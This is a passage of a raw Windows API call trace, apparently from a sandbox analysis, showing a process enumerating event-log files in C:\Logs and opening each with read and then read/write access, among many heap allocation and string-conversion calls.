lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0071.310] AreFileApisANSI () returned 1 [0071.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\HardwareEvents.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\HardwareEvents.evtx", lpUsedDefaultChar=0x0) returned 28 [0071.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.310] AreFileApisANSI () returned 1 [0071.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0071.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78f10 [0071.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0071.310] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.311] GetFileType (hFile=0x428) returned 0x1 [0071.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0071.311] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.311] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.311] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.312] CloseHandle (hObject=0x428) returned 1 [0071.312] AreFileApisANSI () returned 1 [0071.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0071.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78f10 [0071.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0071.312] CreateFileW (lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.312] GetFileType (hFile=0x428) returned 0x1 [0071.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0071.312] CloseHandle (hObject=0x428) returned 1 [0071.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.312] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0071.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.312] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0071.313] AreFileApisANSI () returned 1 [0071.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78f10 [0071.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=28 | out: lpWideCharStr="C:\\Logs\\HardwareEvents.evtx") returned 28 [0071.313] GetFileAttributesExW (in: lpFileName="C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.313] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.313] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Internet Explorer.evtx", cAlternateFileName="INTERN~1.EVT")) returned 1 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.313] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0071.313] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0071.314] AreFileApisANSI () returned 1 [0071.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Internet Explorer.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Internet Explorer.evtx", lpUsedDefaultChar=0x0) returned 31 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.314] AreFileApisANSI () returned 1 [0071.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0071.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53718 [0071.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0071.315] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.315] GetFileType (hFile=0x428) returned 0x1 [0071.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0071.315] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.315] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.315] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.315] CloseHandle (hObject=0x428) returned 1 [0071.316] AreFileApisANSI () returned 1 [0071.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x533b8 [0071.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0071.316] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.316] GetFileType (hFile=0x428) returned 0x1 [0071.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0071.316] CloseHandle (hObject=0x428) returned 1 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0071.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0071.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0071.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0071.317] AreFileApisANSI () returned 1 [0071.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x538c8 [0071.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0071.317] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.317] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0071.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0071.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0071.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0071.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0071.318] InitOnceExecuteOnce (in: 